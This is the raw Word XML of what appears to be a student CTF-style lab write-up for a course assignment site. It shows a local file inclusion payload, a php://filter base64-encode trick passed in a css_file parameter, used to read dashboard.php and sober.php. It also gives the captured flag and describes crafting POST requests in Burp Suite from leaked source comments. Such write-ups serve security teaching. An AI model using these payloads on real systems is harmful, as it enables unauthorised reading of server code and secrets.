          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Visit </w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://assignment-dusty-rose.unimelb.life/style.php?css_file=php://filter/convert.base64-encode/resource=</w:t>
      </w:r>
      <w:r w:rsidR="005145C3">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dashboard</w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can find it requires other files including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sober.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C6423F">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C6423F" w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C6423F">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be </w:t>
      </w:r>
      <w:r w:rsidR="005525C1">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>viewed</w:t>
      </w:r>
      <w:r w:rsidR="00C6423F">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the code folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFCF1E0" w14:textId="7E7DA9EE" w:rsidR="007444DA" w:rsidRPr="007444DA" w:rsidRDefault="004E5CF7" w:rsidP="007444DA">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0469387B" wp14:editId="7C1A9A31">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3665348</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1677089</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1010130" cy="168446"/>
                <wp:effectExtent l="57150" t="19050" r="76200" b="98425"/>
                <wp:wrapNone/>
                <wp:docPr id="5" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1010130" cy="168446"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E71224">
                            <a:alpha val="5000"/>
                          </a:srgbClr>
                        </a:solidFill>
                        <a:ln w="9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22241" id="Rectangle 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:288.6pt;margin-top:132.05pt;width:79.55pt;height:1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" fillcolor="#e71224" strokecolor="#e71224" strokeweight=".25mm">
                <v:fill opacity="3341f"/>
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00047197" w:rsidRPr="00047197">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E2D3DB3" wp14:editId="6C5C1518">
            <wp:extent cx="5359328" cy="2168305"/>
            <wp:effectExtent l="0" t="0" r="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17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5359328" cy="2168305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17423304" w14:textId="2FA3D917" w:rsidR="008D136B" w:rsidRPr="008D136B" w:rsidRDefault="007444DA" w:rsidP="008D136B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, visit </w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://assignment-dusty-rose.unimelb.life/style.php?css_file=php://filter/convert.base64-encode/resource=sober.php</w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we can get the flag: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D7E722" w14:textId="70416164" w:rsidR="007444DA" w:rsidRPr="00047197" w:rsidRDefault="007444DA" w:rsidP="008D136B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG{The_deepeR_YoU_Dig,_the_m0re_GOLD_you'll_find!}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241EFC1C" w14:textId="0944561B" w:rsidR="00DD3528" w:rsidRDefault="0039378A" w:rsidP="00047197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E9017E3" wp14:editId="045F1645">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3772270</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1297788</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2004663" cy="343155"/>
                <wp:effectExtent l="57150" t="19050" r="72390" b="95250"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Rectangle 21"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2004663" cy="343155"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E71224">
                            <a:alpha val="5000"/>
                          </a:srgbClr>
                        </a:solidFill>
                        <a:ln w="9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CDC3" id="Rectangle 21" o:spid="_x0000_s1026" style="position:absolute;margin-left:297.05pt;margin-top:102.2pt;width:157.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" fillcolor="#e71224" strokecolor="#e71224" strokeweight=".25mm">
                <v:fill opacity="3341f"/>
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00047197" w:rsidRPr="00047197">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429BEA5A" wp14:editId="75853107">
            <wp:extent cx="5318911" cy="1636497"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5349903" cy="1646033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4255AD0D" w14:textId="756FFFBD" w:rsidR="00047197" w:rsidRDefault="00047197" w:rsidP="00047197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B2E274" w14:textId="77777777" w:rsidR="005525C1" w:rsidRPr="00047197" w:rsidRDefault="005525C1" w:rsidP="00047197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B1A7A0" w14:textId="1C25EC79" w:rsidR="002932C0" w:rsidRDefault="002932C0" w:rsidP="008733D6">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002932C0">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Section II</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="002932C0">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E1C89D" w14:textId="23A23C78" w:rsidR="00851350" w:rsidRDefault="00851350" w:rsidP="00851350">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Recall that we have retrieved </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> using LFI. Following are the lines of comments from #152 to #160</w:t>
      </w:r>
      <w:r w:rsidR="003F5898">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F5898">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6A016" w14:textId="4DAA15BD" w:rsidR="00C6423F" w:rsidRDefault="00C6423F" w:rsidP="00C6423F">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6423F">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1110D0F3" wp14:editId="112F6A6B">
            <wp:extent cx="5251010" cy="1507434"/>
            <wp:effectExtent l="0" t="0" r="698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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5264364" cy="1511267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC2F85A" w14:textId="5E40901B" w:rsidR="00851350" w:rsidRDefault="00851350" w:rsidP="00851350">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>It seems developers have leaked some sensitive information here. We can try to make post requests to this address by modifying a post request</w:t>
      </w:r>
      <w:r w:rsidR="00547270">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the following shows, which gives the flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64103381" w14:textId="4FCEAB28" w:rsidR="00851350" w:rsidRDefault="0039378A" w:rsidP="00851350">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B16687A" wp14:editId="626C7F29">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3520100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1456897</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2079468" cy="216341"/>
                <wp:effectExtent l="57150" t="19050" r="73660" b="88900"/>
                <wp:wrapNone/>
                <wp:docPr id="40" name="Rectangle 40"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2079468" cy="216341"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E71224">
                            <a:alpha val="5000"/>
                          </a:srgbClr>
                        </a:solidFill>
                        <a:ln w="9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692C1" id="Rectangle 40" o:spid="_x0000_s1026" style="position:absolute;margin-left:277.15pt;margin-top:114.7pt;width:163.75pt;height:1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" fillcolor="#e71224" strokecolor="#e71224" strokeweight=".25mm">
                <v:fill opacity="3341f"/>
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00851350" w:rsidRPr="00851350">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A7B9FE2" wp14:editId="5DCC0790">
            <wp:extent cx="5152616" cy="3340729"/>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5282892" cy="3425194"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00851350">
        <w:rPr>
